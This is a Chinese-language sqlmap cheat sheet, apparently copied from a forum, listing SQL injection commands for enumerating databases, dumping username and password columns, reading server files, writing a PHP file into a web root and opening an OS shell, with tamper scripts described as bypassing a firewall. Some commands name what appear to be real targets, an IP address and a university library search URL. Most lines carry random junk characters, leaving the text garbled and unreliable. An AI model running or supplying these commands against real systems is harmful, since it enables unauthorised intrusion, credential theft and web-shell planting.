/pentest/database/sqlmap; f" H- Q! h) `# B" M6 s4 Y- d
2 ^6 n1 j9 F) i0 X
update :::::> in the folder after execute following order : svn update% {! b' Z& k+ W) }: t. J- N
3 | t- s7 w2 h0 ?( hsqlmap.py -r 1.txt --current-db- c9 n/ O3 J1 |: H X/ A4 B
" `0 J$ z# d8 f, s; Jv 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”0 w2 d' Y9 Y6 ~/ G6 d& Q* }
/ O* Y1 U6 t7 t! r$ h==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
: u l' {2 T: x" A8 S猜解数据库0 \) ?" u! X* a& \$ j5 L- n0 V
./sqlmap.py -u "injection-url" --dbs7 e b) J( U$ }, x ?+ c) }
sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"3 Y; G2 H" z8 G3 x C3 O
* b% |5 c& q. g猜解表名' F% W% B; q+ M( S3 {' z$ A
./sqlmap.py -u "injection-url" -D database_name --tables; z5 }3 s6 A" {4 [5 ^' M: ]8 f
6 x; {$ G3 U, F7 I6 ?1 D
sqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"
' G% C6 p, h$ w- k1 ? t1 Nsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"
9 `1 G( Z! y& y4 \' T4 M. e
6 Z; e0 S$ i+ `: p% Nsqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump
: ^) w7 C W# K: l# w
, Y, A: t4 g& s0 ?- qsqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"9 k/ h' n, F- I9 \; l
sqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
, p8 }+ K: O, }sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
' v4 y% V2 e- J- Wsqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"% [% p: L5 u/ T9 G: W0 [
/ h* J" U& {% @! {; n
sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py": ~& n8 u& T( V+ E2 V9 \
sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"4 h1 R; O5 u6 y) y. W+ ]$ f
sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
, G s, p7 V0 f g, _5 n& qsqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"# f& ] Y Q, A
sqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump
' S5 L& u- S7 ^! P% N8 S; O# S
5 B3 U0 o' u4 k$ F Ysqlmap.py -r 1.txt -v 3 --dbs --batch --tamper "space2morehash.py" 绕过防火墙了! I- _, c! h+ ?. \* G: N' q8 W
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"
) I/ d" ]6 x6 H% n3 W
# Q+ J& l3 C Q/ u. g' }sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"
( {2 e2 g9 g. l/ D/ M3 D猜解列名
5 w) b- }: q# s2 g7 q./sqlmap.py -u "injection-url" -D database_name -T table_name --columns
; {) n$ ]& ^) j( @) O; i
5 F8 g" W1 d$ @sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
2 L, u* y" W' isqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py" 4 b; `, { r( k! b: t. A/ U
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"
1 v8 x! o- H1 ^7 ?& \, K+ @- F3 U2 m w4 P( T# m( ?; G# T
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"2 _; ]9 W8 A3 L9 O# o8 W( P0 J
&submit=Go
! c' p V$ |9 _, G4 `$ o$ j猜解值3 c* j! t" S3 o! `4 o* F) u) V' \
./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump+ d) c6 H- r5 n, X( v
========================================================
$ x1 ]7 E$ w: L* O- _搜索表名中包括mana字符的) M7 I% w5 j3 W& _$ K
/sqlmap.py -u "injection-url" -T mana --search4 T$ i: D4 b% T, Y3 o- o
返回一个交互式sql shell7 a6 V4 L' x3 r$ m- U* A( J
/sqlmap.py -u "injection-url" --sql-shell
& Q. A- W0 j/ y" h" c读取指定文件(需权限)
) m$ ^. H5 v$ p7 M/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"1 D% e' Q4 }: J- ^, h1 `' c" M
查看当前 用户 及 数据库 . M3 P4 C# g% |
/sqlmap.py -u "injection-url" --current-user --current-db. R/ {5 P* W8 G% N6 x
本地文件 写入 远程目标绝对路径# W; l2 d/ g8 z8 u" K. |
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
# ~' ]- s) k! P/ b" _0 Isqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"
( X4 ^) K# b1 \' p/ Y- ?9 ~- u' M/ C. y7 O
sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径) Z0 K2 @/ ^- A ^$ U
查看某用的权限6 {5 B( L4 }0 H7 C
/sqlmap.py -u "injection-url" --privileges -U root
5 j. B& e, O+ g; F' C+ a查看当前用户是否为dba6 W4 a, Q8 q- E, M; D
/sqlmap.py -u "injection-url" --is-dba8 M3 V/ E }! q" |
读取所有数据库用户或指定数据库用户的密码
7 J# b# [- K* U6 x) U6 A) Hsqlmap.py -r 1.txt --users --passwords
3 g& M% a) O* x5 ^sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
% ]7 c% Z9 e5 Y& Z# I
$ C" B' V" |1 |- Z3 Q0 `: `* n; \/ ]/sqlmap.py -u "injection-url" --passwords -U root
1 Y* W" ~) j m
8 z& [$ J+ C( I( u4 s--start&&--stop 与 --first&&--last 的区别
3 }/ r3 }4 C% h9 r( y/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)
% ^, B2 n' ]: k2 w% Q/ m
7 N1 P" q1 C7 P( y! z; X7 f9 h从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)7 o: ]! t- n% y7 b
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables$ _8 @6 w2 x- z' y
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns. d G( e- T. U* W+ Q5 s; d1 N& T
/ D" A& [% H3 q9 j2 c p
执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)& M( h& B" h& C, P0 o
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"3 p6 ?6 B$ S. ^- T- j
& c J7 q5 y# K2 H9 o0 |7 [ |